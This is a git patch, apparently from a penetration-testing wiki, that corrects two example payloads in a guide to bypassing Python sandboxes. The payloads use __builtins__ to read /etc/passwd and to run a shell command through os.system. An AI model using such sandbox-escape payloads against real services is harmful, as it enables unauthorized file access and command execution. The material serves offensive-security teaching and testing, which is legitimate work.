From 1db169095d4dc38569d3d88faff9cb9338623c35 Mon Sep 17 00:00:00 2001 From: CPol Date: Sat, 5 Nov 2022 10:56:30 +0000 Subject: [PATCH] GitBook: [#3652] No subject --- .../python/bypass-python-sandboxes/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md index 27bb05d39..a652f4858 100644 --- a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md +++ b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md @@ -396,8 +396,8 @@ __builtins__["__import__"]('os').system('ls') ```python # Possible payloads once you have found the builtins -.open("/etc/passwd").read() -.__import__("os").system("ls") +__builtins__["open"]("/etc/passwd").read() +__builtins__["__import__"]("os").system("ls") # There are lots of other payloads that can be abused to execute commands # See them below ```